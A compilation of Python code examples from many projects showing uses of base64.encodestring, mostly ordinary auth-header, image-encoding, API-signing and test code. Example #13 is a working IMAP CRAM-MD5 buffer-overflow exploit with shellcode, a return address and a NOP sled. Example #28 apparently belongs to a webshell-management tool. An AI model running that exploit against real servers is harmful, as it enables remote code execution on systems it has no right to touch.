Example #1
    def fieldSerialization(self, field, value):
        """
        Custom serialization for fields whose raw values are not
        JSON-serializable.
        @param field:   field object from the schema
        @type field:    Field
        @param value:   return value of the field's raw accessor on the
        current context
        @type value:    string or stream
        @return:        JSON-serializable value
        @rtype:         string
        """

        if isinstance(field, DateTimeField) and value:
            value = str(value)

        elif HAS_BLOBS and IBlobWrapper.providedBy(value):
            file_ = value.getBlob().open()
            value = {'filename': value.getFilename(),
                     'data': base64.encodestring(file_.read()),
                     'type': 'blob'}
            file_.close()

        elif isinstance(field, FileField) and isinstance(value, File):
            tmp = StringIO.StringIO(value.data)
            tmp.seek(0)
            value = {'filename': value.filename,
                     'data': base64.encodestring(tmp.read())}

        elif isinstance(field, QueryField):
            query = field.getRaw(self.object)
            # Cast "ZPublisher.HTTPRequest.record" instance to dict
            value = [dict(item) for item in query]

        return value
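
All of these examples use base64.encodestring, the legacy name from Python 2; it was deprecated in Python 3.1 and removed in Python 3.9. On Python 3, base64.encodebytes produces the same line-wrapped output and base64.b64encode produces a single line with no trailing newline. A minimal sketch of the modern calls:

import base64

data = b"hello world"
wrapped = base64.encodebytes(data).decode("ascii")   # wrapped at 76 chars, trailing newline
single = base64.b64encode(data).decode("ascii")      # single line, no trailing newline
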
Example #2
    def test_delete_user(self):
        # creating another user
        email = '*****@*****.**'
        user = extract_username(email)
        root = '/user/1.0/%s' % user

        res = self.app.get(root)
        if not json.loads(res.body):
            payload = {'email': '*****@*****.**',
                       'password': '******' * 9,
                       'captcha-challenge': 'xxx',
                       'captcha-response': 'xxx'}
            payload = json.dumps(payload)
            self.app.put(root, params=payload)

        # trying to suppress the old user with the new user
        # this should generate a 401
        environ = {'HTTP_AUTHORIZATION': 'Basic %s' % \
                    base64.encodestring('%s:xxxxxxxxx' % user)}
        self.app.extra_environ = environ
        self.app.delete(self.root, status=401)

        # now using the right credentials
        token = base64.encodestring('%s:%s' % (self.user_name, self.password))
        environ = {'HTTP_AUTHORIZATION': 'Basic %s' % token}
        self.app.extra_environ = environ
        res = self.app.delete(self.root)
        self.assertTrue(json.loads(res.body))

        # tarek should be gone
        res = self.app.get(self.root)
        self.assertFalse(json.loads(res.body))
Example #3
def _MockFetch(url=None):
  if start_try_job._BISECT_CONFIG_PATH in url:
    return testing_common.FakeResponseObject(
        200, base64.encodestring(_BISECT_CONFIG_CONTENTS))
  elif start_try_job._PERF_CONFIG_PATH in url:
    return testing_common.FakeResponseObject(
        200, base64.encodestring(_PERF_CONFIG_CONTENTS))
Example #4
 def _get_file(self, cr, uid, inv_ids, context=None):
     if context is None:
         context = {}
     ids = isinstance(inv_ids, (int, long)) and [inv_ids] or inv_ids
     invoice = self.browse(cr, uid, ids, context=context)[0]
     fname_invoice = invoice.fname_invoice and invoice.fname_invoice + \
         '.xml' or ''
     aids = self.pool.get('ir.attachment').search(cr, uid, [(
         'datas_fname', '=', invoice.fname_invoice+'.xml'), (
             'res_model', '=', 'account.invoice'), ('res_id', '=', invoice.id)])
     xml_data = ""
     if aids:
         brow_rec = self.pool.get('ir.attachment').browse(cr, uid, aids[0])
         if brow_rec.datas:
             xml_data = base64.decodestring(brow_rec.datas)
     else:
         fname, xml_data = self._get_facturae_invoice_xml_data(
             cr, uid, inv_ids, context=context)
         self.pool.get('ir.attachment').create(cr, uid, {
             'name': fname_invoice,
             'datas': base64.encodestring(xml_data),
             'datas_fname': fname_invoice,
             'res_model': 'account.invoice',
             'res_id': invoice.id,
         }, context=None)  # context deliberately not passed: it carries values specific to our code that are not needed here
     self.fdata = base64.encodestring(xml_data)
     msg = _("Press in the button  'Upload File'")
     return {'file': self.fdata, 'fname': fname_invoice,
             'name': fname_invoice, 'msg': msg}
Example #5
def _make_data_file():
    """ Generates the lookup table, writes it to a .py file. """
    import base64
    
    size = (200, 50, 51)
    pdf = N.zeros(size, 'float64')
    cdf = N.zeros(size, 'float64')
    ranges = [ _make_range(_lower[i],_upper[i],size[i]) for i in xrange(len(size)) ]

    print "Generating levy_data.py ..."
    for i in xrange(size[1]):
        for j in xrange(size[2]):
            print "Calculating alpha =", ranges[1][i], "beta = ", ranges[2][j]
            for k in xrange(size[0]):
                pdf[k,i,j] = _levy_tan(ranges[0][k], ranges[1][i], ranges[2][j])
                cdf[k,i,j] = _levy_tan(ranges[0][k], ranges[1][i], ranges[2][j], True)

    file = open("levy_data.py", "wt")
    file.write("""
# This is a generated file, do not edit.
import numpy, base64

pdf = numpy.loads(base64.decodestring(
\"\"\"%s\"\"\"))\n
cdf = numpy.loads(base64.decodestring(
\"\"\"%s\"\"\"))\n""" % 
        (base64.encodestring(pdf.dumps()), base64.encodestring(cdf.dumps())) )
    file.close()
Example #6
 def send_message(self, address, subject, message):
   ack_data = self.api.sendMessage(
                 address,
                 self.default_address.address,
                 base64.encodestring(subject),
                 base64.encodestring(message))
   return ack_data
Example #7
def _encode_binary(format_dict):
    pngdata = format_dict.get('image/png')
    if pngdata is not None:
        format_dict['image/png'] = encodestring(pngdata).decode('ascii')
    jpegdata = format_dict.get('image/jpeg')
    if jpegdata is not None:
        format_dict['image/jpeg'] = encodestring(jpegdata).decode('ascii')
Example #8
    def post(self):
        if not self.current_user:
            raise tornado.web.HTTPError(403)
            return
        self.user = tornado.escape.json_decode(self.current_user)
        id = tornado.escape.xhtml_escape(self.user["email"])
 
        cx = sqlite3.connect("/home/work/diancan/data/dinner.db")
        cu = cx.cursor()
        data = self.get_argument('json')
        data = urllib2.unquote(data)
        data = json.loads(data)
        if id.split("@")[1] != "wandoujia.com":
            raise tornado.web.HTTPError(403)
            return
        dead = int(time.strftime("%H%M", time.localtime()))
        #if dead >= 1902:
        #    raise tornado.web.HTTPError(403)
        #    return

        str_time = time.strftime("%Y%m%d", time.localtime())
        data['real_name'] = c.get("dinner:cname:%s" % id)

        timestamp = str(int(time.time()))
        params = dict()
        params['order'] = json.dumps(data)
        params['timestamp'] = timestamp
        params['signature'] = sign(timestamp)

        params = urllib.urlencode(params)
        url = "http://api.meican.com/corps/wandoujia/addorder"
        http_client = tornado.httpclient.AsyncHTTPClient()
        response = yield tornado.gen.Task(http_client.fetch, url, method="POST",body=params)
        resp = json.loads(response.body)
        self.write(response.body)
        if resp['status'] <= 0 and resp['status'] != -5 :
            raise tornado.web.HTTPError(403,(response.body).encode("utf-8"))
            return
        elif resp['status'] == -5:
            raise tornado.web.HTTPError(403)
            return

        for i in data['order']:
            rname = i['from']
            name = i['name']

            bid = base64.encodestring(id.encode("utf-8")).strip()
            froms = base64.encodestring(rname.encode("utf-8")).strip()
            dish = base64.encodestring(name.encode("utf-8")).strip()
            number = int(i['number'])
            price = int(i['price'])
            day = int(str_time)
            li = json.dumps(i)
            c.lpush("dinner:%s:%s" % (str_time, id), li)
            cu.execute(
                'insert into orders (id,froms,dish,number,price,day) values(?,?,?,?,?,?)',
                (bid, froms, dish, number, price, day))
            cx.commit()
        self.finish("ok") 
        return
Example #9
def bundleProxy( executableFile, proxy ):
  """ Create a self extracting archive bundling together an executable script and a proxy
  """
  
  compressedAndEncodedProxy = base64.encodestring( bz2.compress( proxy.dumpAllToString()['Value'] ) ).replace( '\n', '' )
  compressedAndEncodedExecutable = base64.encodestring( bz2.compress( open( executableFile, "rb" ).read(), 9 ) ).replace( '\n', '' )

  bundle = """#!/usr/bin/env python
# Wrapper script for executable and proxy
import os, tempfile, sys, stat, base64, bz2, shutil
try:
  workingDirectory = tempfile.mkdtemp( suffix = '_wrapper', prefix= 'TORQUE_' )
  os.chdir( workingDirectory )
  open( 'proxy', "w" ).write(bz2.decompress( base64.decodestring( "%(compressedAndEncodedProxy)s" ) ) )
  open( '%(executable)s', "w" ).write(bz2.decompress( base64.decodestring( "%(compressedAndEncodedExecutable)s" ) ) )
  os.chmod('proxy', stat.S_IRUSR | stat.S_IWUSR)
  os.chmod('%(executable)s', stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
  os.environ["X509_USER_PROXY"]=os.path.join(workingDirectory, 'proxy')
except Exception as x:
  print >> sys.stderr, x
  sys.exit(-1)
cmd = "./%(executable)s"
print 'Executing: ', cmd
sys.stdout.flush()
os.system( cmd )

shutil.rmtree( workingDirectory )

""" % { 'compressedAndEncodedProxy': compressedAndEncodedProxy, \
        'compressedAndEncodedExecutable': compressedAndEncodedExecutable, \
        'executable': os.path.basename( executableFile ) }

  return bundle
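
The two blobs above are bz2-compressed, base64-encoded, and stripped of newlines so they can be pasted into the generated wrapper script, which reverses the steps with base64.decodestring and bz2.decompress. A quick round-trip check of that encoding (the payload value is an illustrative stand-in, not a real proxy dump):

import base64, bz2

payload = "-----BEGIN CERTIFICATE-----..."  # illustrative stand-in for proxy.dumpAllToString()['Value']
blob = base64.encodestring(bz2.compress(payload)).replace('\n', '')
assert bz2.decompress(base64.decodestring(blob)) == payload
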
Example #10
File: microcouch.py Project: cclauss/etc
 def do_auth(self, parts):
     if parts.username and parts.password:
         auth_tuple = (parts.username, parts.password)
         self.auth = base64.encodestring('%s:%s' % auth_tuple).strip()
     elif parts.username:
         auth_tuple = (parts.username, getpass.getpass())
         self.auth = base64.encodestring('%s:%s' % auth_tuple).strip()
Example #11
 def hash_key(self, key):
     guid = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
     combined = key + guid
     print combined
     hashed = sha1(combined).digest()
     print encodestring(hashed)
     return encodestring(hashed)
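
The GUID concatenated above is the fixed magic string from RFC 6455: the WebSocket handshake's Sec-WebSocket-Accept value is the base64 of the SHA-1 of the client key plus that GUID. A standalone sketch using the RFC's own test vector (websocket_accept is an illustrative helper, not the method above):

import base64
from hashlib import sha1

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # RFC 6455 magic GUID

def websocket_accept(sec_websocket_key):
    # Sec-WebSocket-Accept = base64(SHA-1(key + GUID))
    digest = sha1((sec_websocket_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")

# Test vector from RFC 6455, section 1.3:
assert websocket_accept("dGhlIHNhbXBsZSBub25jZQ==") == "s3pPLMBiTxaQ9kYGzzhZRbK+xOo="
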
Example #12
def get_request_url(command_str, args):
    baseurl='http://172.16.206.143:8080/client/api?'
    request={}
    #request['command']='listUsers'
    #below is private api under cloudstack 4.0.2
    #request['command']='createVMSnapshot'
    #request['vmid']='50e9dbdd-2efe-4df0-8478-581fd43088ce'
    request['command'] = command_str
    if args is not None:
        for k,v in args.iteritems():
            request[k]=v
    #request['response']='xml'
    request['response']='json'

    request['apikey']=''
    secretkey=''

    request_str='&'.join(['='.join([k,urllib.quote_plus(request[k])]) for k in request.keys()])
    sig_str='&'.join(['='.join([k.lower(),urllib.quote_plus(request[k].lower().replace('+','%20'))])for k in sorted(request.iterkeys())])
    sig=urllib.quote_plus(base64.encodestring(hmac.new(secretkey,sig_str,hashlib.sha1).digest()).strip())
    req=baseurl+request_str+'&signature='+sig
    return req
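
The function above follows the CloudStack API signing scheme: sort the parameters, lowercase the values, HMAC-SHA1 the resulting string with the secret key, base64-encode, strip, and URL-quote the result before appending it as the signature parameter. A condensed sketch of just that signing step (key and query string are illustrative placeholders):

import base64, hashlib, hmac, urllib

secretkey = 'my-secret-key'                              # illustrative
sig_str = 'apikey=abc&command=listusers&response=json'   # lowercased, sorted query string
digest = hmac.new(secretkey, sig_str, hashlib.sha1).digest()
signature = urllib.quote_plus(base64.encodestring(digest).strip())
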
Example #13
File: 23172_2.py Project: B-Rich/osf_db
def exp(host, port):
       buffer = "\x90" * 193
       buffer += ("\xdb\xd2\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x0a\xbb\x71\x35\x21"
       "\xfe\x31\x58\x17\x03\x58\x17\x83\x99\xc9\xc3\x0b\x6a\xe0\x62"
       "\x75\x46\xfb\x64\x37\x04\x6e\x79\xef\x65\x40\x41\x0a\x2f\xe9"
       "\x56\xac\x9b\x21\x99\x9a\xa8\xb8\x76\x51\x44\x93\xfc\x7d\x67"
       "\x0b\xf4\x81")

       try:
               s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
               connect=s.connect((host,port))
               d=s.recv(1024)
               print d
               s.send('a001 authenticate cram-md5\r\n')
               d=s.recv(1024)
               d=d[2:1022].strip()
               print d
               m=md5.new()
               m.update(d)
               digest = m.digest()
               buffer += struct.pack('<L',  0x7765ebc0) # call eax 6014DC6E (ptr to 6014DC68)
               buffer += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
               buffer = buffer + ' ' + digest
               s.send(base64.encodestring(buffer) + '\r\n')
               print "\nsending...\n", base64.encodestring(buffer) , '\r\n'
       except:
               "Can't connect to IMAP server"
Example #14
def encode_images(format_dict):
    """b64-encodes images in a displaypub format dict
    
    Perhaps this should be handled in json_clean itself?
    
    Parameters
    ----------
    
    format_dict : dict
        A dictionary of display data keyed by mime-type
    
    Returns
    -------
    
    format_dict : dict
        A copy of the same dictionary,
        but binary image data ('image/png' or 'image/jpeg')
        is base64-encoded.
    
    """
    encoded = format_dict.copy()
    pngdata = format_dict.get('image/png')
    if isinstance(pngdata, bytes) and pngdata[:8] == PNG:
        encoded['image/png'] = encodestring(pngdata).decode('ascii')
    jpegdata = format_dict.get('image/jpeg')
    if isinstance(jpegdata, bytes) and jpegdata[:2] == JPEG:
        encoded['image/jpeg'] = encodestring(jpegdata).decode('ascii')
    return encoded
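
A minimal usage sketch for encode_images, assuming PNG is the 8-byte PNG file signature defined alongside the function (b'\x89PNG\r\n\x1a\n' in IPython's jsonutil); the image bytes here are an illustrative stand-in:

PNG = b'\x89PNG\r\n\x1a\n'              # assumed module-level signature constant
fake_png = PNG + b'\x00' * 16           # stand-in for real image data
fmt = {'text/plain': '<Figure>', 'image/png': fake_png}
encoded = encode_images(fmt)            # function defined above
# encoded['image/png'] is now an ASCII base64 string that is safe to embed in
# JSON; the original format_dict is left untouched because a copy is returned.
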
Example #15
 def testPNGFileToConvertOdpToHTML(self):
   """Test run_generate method from odp with png to html.
    This test if returns good png files"""
   generate_result = self.proxy.run_generate('test_png.odp',
                                     encodestring(
                                     open(join('data', 'test_png.odp')).read()),
                                     None, 'html',
                                     'application/vnd.oasis.opendocument.presentation')
   response_code, response_dict, response_message = generate_result
   self.assertEquals(response_code, 200)
   self.assertEquals(type(response_dict), DictType)
   self.assertNotEquals(response_dict['data'], '')
   self.assertEquals(response_dict['mime'], 'application/zip')
   output_url = join(self.tmp_url, "zip.zip")
   open(output_url, 'w').write(decodestring(response_dict['data']))
   self.assertTrue(is_zipfile(output_url))
   zipfile = ZipFile(output_url)
   try:
     png_path = join(self.tmp_url, "img0.png")
     zipfile.extractall(self.tmp_url)
     content_type = self._getFileType(encodestring(open(png_path).read()))
     self.assertEquals(content_type, 'image/png')
     m = magic.Magic()
     self.assertTrue("8-bit/color RGB" in m.from_file(png_path))
   finally:
     zipfile.close()
   if exists(output_url):
     remove(output_url)
Example #16
 def _process_url(self, url):
     """ Extract auth credentials from url, if present """
     parts = urlparse(url)
     if not parts.username and not parts.password:
         return url, None
     if parts.port:
         netloc = '%s:%s' % (parts.hostname, parts.port)
     else:
         netloc = parts.hostname
     url_tuple = (
                 parts.scheme,
                 netloc,
                 parts.path,
                 parts.params,
                 parts.query,
                 parts.fragment
                 )
     url = urlunparse(url_tuple)
     if parts.username and parts.password:
         auth_tuple = (parts.username, parts.password)
         auth = base64.encodestring('%s:%s' % auth_tuple).strip()
         return url, "%s" % auth
     else:
         auth_tuple = (parts.username, getpass.getpass())
         auth = base64.encodestring('%s:%s' % auth_tuple).strip()
         return url, "%s" % auth
Example #17
	def putFile(self, content, filename, useCompression = False, username = None):
		"""
		Puts content as a file named filename in the server's document root.
		
		ATS, campaigns, etc are stored as utf-8. So you should make sure
		your content is utf-8 encoded when using this method.
		
		Automatically creates missing directories to filename, if needed.
		
		If the filename points outside the document root, returns False.
		
		@type  content: (buffer-like) string (typically utf-8)
		@param content: the file content
		@type  filename: string
		@param filename: the complete path within the docroot of the filename to create/modify
		@type  useCompression: bool
		@param useCompression: if set to True, compress the content before sending it (requires Ws 1.3)
		@type  username: string
		@param username: if set, the username of the user who is writing this file, for
		revisions management (requires Ws 1.7)
		
		@throws Exception in case of a (technical ?) error
		
		@rtype: bool
		@returns: True if the creation/update was ok, False otherwise
		"""
		self.getLogger().debug("Putting file %s to repository..." % filename)
		if useCompression:
			payload = base64.encodestring(zlib.compress(content))
			res = self.__proxy.putFile(payload, filename, True, username)
		else:
			payload = base64.encodestring(content)
			res = self.__proxy.putFile(payload, filename)
		self.getLogger().debug("putFile: " + str(res))
		return res
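
The compression branch above pairs with a symmetric decode on the receiving side (base64.decodestring, then zlib.decompress). A standalone round-trip sketch of that encoding, not the client's actual server code:

import base64, zlib

content = u"# my ATS script".encode("utf-8")       # utf-8 payload, as the docstring recommends
payload = base64.encodestring(zlib.compress(content))
restored = zlib.decompress(base64.decodestring(payload))
assert restored == content
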
Example #18
 def __init__(self, ticket):
     self.ticket = ticket
     self.rid = None
     if version == 3:
         self.auth = str(base64.encodestring(bytes('%s:%s' % (rb_user, rb_pass), 'ascii')), 'ascii').replace('\n', '')
     else:
         self.auth = str(base64.encodestring(bytes('%s:%s' % (rb_user, rb_pass)))).replace('\n', '')
     try:
         opener = None
         if version == 3:
             opener = urllib.request.build_opener()
         else:
             opener = urllib2.build_opener()
             
         opener.addheaders = [('Authorization', 'Basic %s' % self.auth)]
         opener.addheaders = [('Accept', 'application/json')]
         url = opener.open("https://reviews.apache.org/api/search/?q=%s" % self.ticket)
         
         data = None
         if version == 3:
             data = str(url.read(), 'ascii')
         else:
             data = str(url.read())
                 
         obj = json.loads(data)
         if "search" in obj and "review_requests" in obj['search']:
             for key in range(len(obj['search']['review_requests'])):
                 summary = obj['search']['review_requests'][key]['summary'] + " "
                 id = obj['search']['review_requests'][key]['id']
                 if re.search(self.ticket + "\D", summary):
                     self.rid = id
                     break
     except:    
         logging.warning("urllib error")
Example #19
	def __init__(self, server, root, username, password):
		self.server = server
		self.root = root
		self.username = username
		self.password = password
		self.authentication = "Basic %s" % base64.encodestring('%s:%s' % (self.username, self.password))[:-1]
		
		try:
			response = urltools.Request(self.root, base=self.server, expect=urltools.HTML)
		except urllib2.HTTPError, e:
			if hasattr(e, "code") and e.code == 401:
				base64string = base64.encodestring('%s:%s' % (self.username, self.password))[:-1]
				try:
					response = urltools.Request(
						self.root,
						base=self.server,
						expect=urltools.HTML,
						headers={"Authorization": "Basic %s" % base64string}
					)
				except:
					debug.debug_exception()
					raise
			else:
				debug.debug_exception()
				raise
Example #20
    def pic_post(self,**kw):
        if kw.has_key("dbport"):
            dbport=kw.get("dbport")
        else:
            dbport=kw.get("en_dbport")

        #_logger.info(request.httprequest.files)
        if kw.get("choosefile"):
            key="CN"
            id=kw.get("cn_data_id").encode("utf-8")
            mimetype=kw.get("choosefile").mimetype
        elif kw.get("en_choosefile"):
            key="EN"
            id=kw.get("en_data_id").encode("utf-8")
            mimetype=kw.get("en_choosefile").mimetype
        #_logger.info(dir(kw.get("choosefile").stream))
        #_logger.info(base64.encodestring(kw.get("choosefile").stream.read()))
        if key=="CN":
            fs=base64.encodestring(kw.get("choosefile").stream.read())
        else:
            fs=base64.encodestring(kw.get("en_choosefile").stream.read())
        conn = pymongo.Connection(self.DBIP,int(dbport))
        db = conn.disease  # connect to the "disease" database
        res=db.disease.find_one({"_id":id})
        res[key]['pic']={"mimetype":mimetype,"base64":fs}
        db.disease.update({"_id":id},res)
        return 'OK'
Example #21
 def addCategory(self, title, url, action, menu=None):
     url=sys.argv[0]+"?url="+base64.encodestring(url)+"&title="+base64.encodestring(title)+"&action="+urllib.quote_plus(action)
     listitem=xbmcgui.ListItem(title,iconImage="DefaultFolder.png", thumbnailImage="DefaultFolder.png")
     listitem.setInfo( type="Video", infoLabels={ "Title": title } )
     if menu:
         listitem.addContextMenuItems(menu, replaceItems=True)
     xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=url, listitem=listitem, isFolder=True)
Example #22
 def _hashPassword(self, password, scheme, salt=None):
     """
     Return hashed password (including salt).
     """
     scheme = scheme.lower()
     if scheme not in AVAIL_USERPASSWORD_SCHEMES.keys():
         raise ValueError, 'Hashing scheme %s not supported for class %s.' % (
             scheme, self.__class__.__name__
         )
     if salt is None:
         if scheme=='crypt':
             salt = _salt(saltLen=2, saltAlphabet=CRYPT_ALPHABET)
         elif scheme in ['smd5', 'ssha']:
             salt = _salt(saltLen=4, saltAlphabet=None)
         else:
             salt = ''
     if scheme=='crypt':
         return crypt.crypt(password, salt)
     elif scheme in ['md5', 'smd5']:
         return base64.encodestring(md5(password.encode()+salt).digest()+salt).strip()
     elif scheme in ['sha', 'ssha']:
         return base64.encodestring(sha(password.encode()+salt).digest()+salt).strip()
     else:
         return password
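
For the salted schemes the salt is appended to the digest before base64-encoding, which is what lets a verifier split it back out later. A hedged sketch of the matching check for the 'ssha' case (check_ssha is an illustrative helper, not part of the class above):

import base64
from hashlib import sha1

def check_ssha(password, stored):
    # stored is base64(sha1(password + salt) + salt), as produced above for 'ssha'
    raw = base64.decodestring(stored)
    digest, salt = raw[:20], raw[20:]   # SHA-1 digests are 20 bytes long
    return sha1(password + salt).digest() == digest
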
Example #23
 def get_image(self, cr, uid, id, context=None):
     each = self.read(cr, uid, id, ['link', 'url', 'name', 'file_db_store', 'product_id', 'name', 'extention'])
     if each['link']:
         (filename, header) = urllib.urlretrieve(each['url'])
         f = open(filename , 'rb')
         img = base64.encodestring(f.read())
         f.close()
     else:
         local_media_repository = self.pool.get('res.company').get_local_media_repository(cr, uid, context=context)
         if local_media_repository:
             product_code = self.pool.get('product.product').read(cr, uid, each['product_id'][0], ['default_code'])['default_code']
             full_path = os.path.join(local_media_repository, product_code, '%s%s'%(each['name'], each['extention']))
             if os.path.exists(full_path):
                 try:
                     f = open(full_path, 'rb')
                     img = base64.encodestring(f.read())
                     f.close()
                 except Exception, e:
                     logger = netsvc.Logger()
                     logger.notifyChannel('product_images', netsvc.LOG_ERROR, "Can not open the image %s, error : %s" %(full_path, e))
                     return False
             else:
                 logger = netsvc.Logger()
                 logger.notifyChannel('product_images', netsvc.LOG_ERROR, "The image %s doesn't exist " %full_path)
                 return False
         else:
Example #24
def _mapOid(id_mapping, oid):
    idprefix = str(u64(oid))
    id = id_mapping[idprefix]
    old_aka = encodestring(oid)[:-1]
    aka=encodestring(p64(long(id)))[:-1]  # Rebuild oid based on mapped id
    id_mapping.setConvertedAka(old_aka, aka)
    return idprefix+'.', id, aka
Example #25
File: views.py Project: corwinliu/lab2
def setting(request):
	
	print "home"
	user =request.user
	ph=PHOTO.objects.create()
	if request.method == 'POST':
		print "post"
		
		print request.FILES
		if 'photo' in request.FILES:
			if request.FILES['photo'].size > 3500000:
				return render_to_response('home.html',{'overflow':1} ,context_instance=RequestContext(request))	

#log
			LOG.objects.create(meta = request.META,date =datetime.datetime.now())

			try:	
				ph.photo = request.FILES['photo']
				ph.save()
				ph2 = PHOTO.objects.create()
				t = random.randint(0,1000000)
				process(Image.open(ph.photo.path)).save(str(t)+'out.png')
				ph2.photo.save("qwe",File(open(str(t)+'out.png')))
			except Exception,e:
				print "erro",e
			ck = 0
			if ph2.photo:
				code = base64.encodestring("hello"+str(ph2.pk)+"world").strip()
				
			else:
				code = base64.encodestring("hello"+str(ph.pk)+"world").strip()
				ck=1
			return HttpResponseRedirect(reverse('usermanager:result', args=(code,ck,)))
		else:
			pass
Example #26
 def getThings(self, hv_datatype):
     header = '<header>\
                     <method>GetThings</method>\
                     <method-version>1</method-version>\
                     <record-id>' + self.record_id + '</record-id>\
                     <auth-session>\
                         <auth-token>' + self.auth_token + '</auth-token>\
                         <offline-person-info>\
                             <offline-person-id>' + self.person_id + '</offline-person-id>\
                         </offline-person-info>\
                     </auth-session>\
                     <language>en</language>\
                     <country>US</country>\
                     <msg-time>' + self.time_gen() + '</msg-time>\
                     <msg-ttl>36000</msg-ttl>\
                     <version>0.0.0.1</version>'
     
     #QUERY INFO 
     info = '<info><group><filter><type-id>' + hv_datatype + '</type-id></filter><format><section>core</section><xml/></format></group></info>'
     
     # INFO TO ADD WEIGHT.. change METHOD in header to PutThings
     #info = '<info><thing><type-id>3d34d87e-7fc1-4153-800f-f56592cb0d17</type-id><data-xml><weight><when><date><y>2008</y><m>6</m><d>15</d></date><time><h>10</h><m>23</m><s>10</s></time></when><value><kg>60</kg><display units="lb" units-code="lb">120</display></value></weight><common/> </data-xml> </thing> </info>'
     
     infodigest = base64.encodestring(sha1(info).digest()) 
     headerinfo = '<info-hash><hash-data algName="SHA1">' + infodigest.strip() + '</hash-data></info-hash>'
     header = header + headerinfo + '</header>'
     
     hashedheader = hmac.new(self.sharedsec, header, 'sha1')
     hashedheader64 = base64.encodestring(hashedheader.digest())
     
     hauthxml = '<auth><hmac-data algName="HMACSHA1">' + hashedheader64.strip() + '</hmac-data></auth>'
     payload = '<wc-request:request xmlns:wc-request="urn:com.microsoft.wc.request">' + hauthxml + header + info + '</wc-request:request>'
     response = self.sendRequest(payload)
     return response
Example #27
 def putThings(self, hv_datatype, data_xml):
     header = '<header>\
                     <method>PutThings</method>\
                     <method-version>1</method-version>\
                     <record-id>' + self.record_id + '</record-id>\
                     <auth-session>\
                         <auth-token>' + self.auth_token + '</auth-token>\
                         <offline-person-info>\
                             <offline-person-id>' + self.person_id + '</offline-person-id>\
                         </offline-person-info>\
                     </auth-session>\
                     <language>en</language>\
                     <country>US</country>\
                     <msg-time>' + self.time_gen() + '</msg-time>\
                     <msg-ttl>36000</msg-ttl>\
                     <version>0.0.0.1</version>'
     
     #QUERY INFO
     info = '<info><thing><type-id>' + hv_datatype + '</type-id><data-xml>' + data_xml + '</data-xml></thing></info>'
     
     infodigest = base64.encodestring(sha1(info).digest()) 
     headerinfo = '<info-hash><hash-data algName="SHA1">' + infodigest.strip() + '</hash-data></info-hash>'
     header = header + headerinfo + '</header>'
     
     hashedheader = hmac.new(self.sharedsec, header, 'sha1')
     hashedheader64 = base64.encodestring(hashedheader.digest())
     
     hauthxml = '<auth><hmac-data algName="HMACSHA1">' + hashedheader64.strip() + '</hmac-data></auth>'
     payload = '<wc-request:request xmlns:wc-request="urn:com.microsoft.wc.request">' + hauthxml + header + info + '</wc-request:request>'
     response = self.sendRequest(payload)
     return response
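
Both methods above sign the request the same way: the <info> block is SHA-1 hashed and embedded in the header as an info-hash, then the completed header is HMAC-SHA1'd with the shared secret and sent as the <auth> element. A condensed sketch of just that signing step, with illustrative placeholder values:

import base64, hashlib, hmac

sharedsec = 'shared-secret-from-auth'          # illustrative placeholder
info = '<info><group>...</group></info>'       # illustrative placeholder
header = '<header><method>GetThings</method>...<version>0.0.0.1</version>'  # still open

info_hash = base64.encodestring(hashlib.sha1(info).digest()).strip()
header = header + '<info-hash><hash-data algName="SHA1">' + info_hash + '</hash-data></info-hash></header>'
auth = base64.encodestring(hmac.new(sharedsec, header, hashlib.sha1).digest()).strip()
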
Example #28
def add_shell(siteurl,sitepass,config,remarks,type_id,script,coding):  # add a record
    try:
        global treeWidget_id  # currently selected ID
        # siteurl  # URL
        # sitepass # password
        # config   # configuration
        # remarks  # notes
        # type_id  # category
        # script   # script type: asp / php
        # coding   # character encoding
        config=base64.encodestring(str(config))  # encode with encodestring, decode later with decodestring
        remarks=base64.encodestring(u"%s"%(remarks))  # encode with encodestring, decode later with decodestring
        # sql_data="insert into sitetable(type_id,siteurl,sitepass,config,remarks,script,coding,createtime) " \
        #          "VALUES((select ID from type where name='%s'),'%s','%s','%s','%s','%s','%s','%s')"\
        #          %(base64.encodestring(str(type_id)),siteurl,sitepass,config,remarks,script,coding,str(time.time()))
        sql_data="insert into sitetable(type_id,siteurl,sitepass,link,config,remarks,script,coding,createtime) " \
                 "VALUES(%s,'%s','%s','%s','%s','%s','%s','%s','%s')" \
                 %(str(type_id),siteurl,sitepass,"2",config,remarks,script,coding,str(time.time()))
        if shell_sql.mysqlite3_insert(sql_data):
            # load the SHELL list before reloading the directory tree
            add_tableWidget(str(ui.treeWidget_id))   # refresh the current list
            treeWidget_work.reload_tree()  # reload the directory tree
            msg.msg_lower_Left(u"Added SHELL url:%s successfully"%(str(siteurl)))  # bottom-right notification
            main_ui.tableWidget.scrollToBottom()   # scroll to the bottom of the list
        else:
            msg.msg_lower_Left(u"Failed to add SHELL url:%s"%(str(siteurl)))  # bottom-right notification
    except BaseException, e:
        log.logging.debug("except:%s"%(str(e)))
Example #29
 def store_credentials(self, acc, credentials):
     try:
         logger.debug("Storing base64 credentials for account: %s" % (acc.get_name()))
         acc["username"] = base64.encodestring(credentials.username)
         acc["password"] = base64.encodestring(credentials.password)
     except Exception, e:
         raise KeyringException("Cannot encode the base64 username password for account %s" % (acc.get_name()), e)
Example #30
    def _get_api_cfg(self):
        if self._api_cfg:
            # return cached configuration
            return self._api_cfg

        if self.configuration.blockbridge_auth_scheme == 'password':
            user = self.configuration.safe_get('blockbridge_auth_user')
            pw = self.configuration.safe_get('blockbridge_auth_password')
            creds = "%s:%s" % (user, pw)
            if six.PY3:
                creds = creds.encode('utf-8')
                b64_creds = base64.encodestring(creds).decode('ascii')
            else:
                b64_creds = base64.encodestring(creds)
            authz = "Basic %s" % b64_creds.replace("\n", "")
        elif self.configuration.blockbridge_auth_scheme == 'token':
            token = self.configuration.blockbridge_auth_token or ''
            authz = "Bearer %s" % token

        # set and return cached api cfg
        self._api_cfg = {
            'host': self.configuration.blockbridge_api_host,
            'port': self.configuration.blockbridge_api_port,
            'base_url': '/api/cinder',
            'default_headers': {
                'User-Agent': ("cinder-volume/%s" %
                               BlockbridgeISCSIDriver.VERSION),
                'Accept': 'application/vnd.blockbridge-3+json',
                'Authorization': authz,
            },
        }

        return self._api_cfg
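
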